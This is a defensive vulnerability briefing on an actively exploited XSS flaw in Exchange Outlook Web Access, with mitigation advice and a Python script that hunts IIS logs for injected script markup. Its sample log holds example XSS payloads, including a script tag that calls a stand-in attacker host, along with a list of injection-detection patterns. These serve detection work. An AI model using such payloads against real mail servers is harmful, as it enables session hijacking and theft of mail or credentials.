[KEV] CVE-2026-42897 -- CVSS 0.0 Vulnerability Briefing
[KEV] CVE-2026-42897 | CVSS 0.0 (unscored: 0.0 is the CVSS "None" band, not Low; a published score is pending) | Exploit: Operational
What Is It
CVE-2026-42897 is a cross-site scripting (XSS) vulnerability in Microsoft Exchange Server, located in the Outlook Web Access (OWA) component's web page generation (improper neutralization of input during page rendering).
Technical Detail
The flaw exists in how Exchange Server generates web content within Outlook Web Access: attacker-controlled input reaches the rendered page without adequate encoding, so injected JavaScript executes in the victim's browser inside the OWA origin when specific interaction conditions are met. Exploitation likely requires a user to open or interact with a crafted page or message delivered through OWA, making this a client-side attack vector. Because the script runs with the victim's authenticated OWA session, successful exploitation could allow session hijacking, credential theft, reading or sending mail on the victim's behalf, or further client-side attacks, scoped by the privileges of the authenticated user.
Exploitation Status
CISA added this vulnerability to the Known Exploited Vulnerabilities catalog on May 15, 2026, which confirms active exploitation in the wild. The exploit maturity is rated Operational, meaning functional exploit code exists and is being used in real-world attacks, not merely as a proof of concept. Organizations should treat this as an actively weaponized vulnerability requiring immediate attention.
Who Is Targeting This
No specific threat actor attribution has been confirmed at this time. No campaign data or sector targeting information is currently available in the published intelligence. Given the nature of the affected component, Exchange Server environments in any sector should be considered at risk.
What To Do
Apply the relevant Microsoft security update for Exchange Server immediately. Per CISA's Known Exploited Vulnerabilities catalog listing dated May 15, 2026, federal agencies are required under Binding Operational Directive 22-01 to patch or apply mitigations by the due date recorded in that catalog entry. All organizations should prioritize patching given confirmed active exploitation. If patching cannot be completed immediately, restrict external access to OWA (for example, publish it only behind VPN or an authenticating reverse proxy) and consider Content Security Policy headers, with the caveat that OWA relies on inline scripts, so any CSP must be tested before deployment or it will break the client. For detection, review the IIS logs on the Exchange server for OWA requests whose URL, query string, or referrer carries script markup or unusual URL encoding, and watch endpoints for unexpected outbound connections originating from OWA browser sessions. Review Exchange mailbox and admin audit logs for signs of unauthorized access or session anomalies, such as new inbox rules, mailbox delegation changes, or access from unfamiliar client addresses.
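The log review above, as an added illustration that is not part of this briefing or of any Microsoft tooling: a small Python hunter that parses IIS W3C logs (the default Exchange location is C:\inetpub\logs\LogFiles\W3SVC1\), URL-decodes each OWA request twice to catch double-encoded payloads, and flags generic script-injection indicators. The indicator list is a heuristic for XSS in general, not the payload used in CVE-2026-42897, which this briefing does not publish; the sample log lines, hostnames and addresses are constructed for the example.

```python
"""Hunt IIS W3C logs for OWA requests that carry XSS-style markup.

Added example, not part of the original briefing. The indicators are generic
XSS heuristics; the actual CVE-2026-42897 payload is not public here.
"""
import re
import sys
import urllib.parse
from typing import Iterator, List, Optional

# Constructed sample in IIS W3C format. Hosts, users and addresses are fictitious.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-05-16 09:12:01 10.0.0.5 GET /owa/ - 443 alice 203.0.113.9 Mozilla/5.0 200
2026-05-16 09:12:07 10.0.0.5 GET /owa/ url=%3Cscript%3Efetch(%27https://attacker.example/c%27)%3C/script%3E 443 alice 203.0.113.9 Mozilla/5.0 200
2026-05-16 09:12:09 10.0.0.5 POST /owa/service.svc action=GetAttachment 443 bob 198.51.100.3 Mozilla/5.0 200
2026-05-16 09:12:30 10.0.0.5 GET /owa/ path=%2522%2520onerror%253Dalert(1)%2520 443 - 203.0.113.9 Mozilla/5.0 401
"""

# Ordered so the most specific indicator wins; all are case-insensitive.
XSS_INDICATORS = [
    ("script-tag", re.compile(r"<\s*script", re.I)),
    ("event-handler", re.compile(r"\bon\w+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("html-element", re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I)),
]


def decode(value: str) -> str:
    """URL-decode twice so a double-encoded '<' (%253C) is caught as well."""
    return urllib.parse.unquote(urllib.parse.unquote(value))


def parse_w3c(text: str) -> Iterator[dict]:
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()  # IIS encodes spaces inside fields as '+'
        if len(values) != len(fields):
            continue  # truncated or malformed line; skip rather than misalign
        yield dict(zip(fields, values))


def classify(stem: str, query: str) -> Optional[str]:
    """Return the first indicator found in the decoded stem+query, else None."""
    haystack = decode(stem) + "?" + decode(query)
    for name, pattern in XSS_INDICATORS:
        if pattern.search(haystack):
            return name
    return None


def scan_iis_log(text: str) -> List[dict]:
    """Return the OWA requests whose URL carries an XSS indicator."""
    hits = []
    for req in parse_w3c(text):
        stem = req.get("cs-uri-stem", "")
        if not stem.lower().startswith("/owa"):
            continue  # only the OWA virtual directory is in scope here
        indicator = classify(stem, req.get("cs-uri-query", "-"))
        if indicator:
            hits.append({
                "time": f'{req["date"]} {req["time"]}',
                "client": req.get("c-ip"),
                "user": req.get("cs-username"),
                "status": req.get("sc-status"),
                "indicator": indicator,
                "decoded": decode(req.get("cs-uri-query", "")),
            })
    return hits


if __name__ == "__main__":
    # Usage: python owa_xss_hunt.py u_ex260516.log  (falls back to the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_LOG
    for hit in scan_iis_log(source):
        print(hit)
```

Treat a hit as a lead, not a verdict: a 401 on a request carrying an event-handler string still shows someone probing the endpoint, while a 200 from an authenticated user is the line to pivot on (same client address, same session window) in the mailbox audit log. Extend the field whitelist to cs(Referer) if your log profile records it, since an injected message can arrive through a referrer rather than the query string.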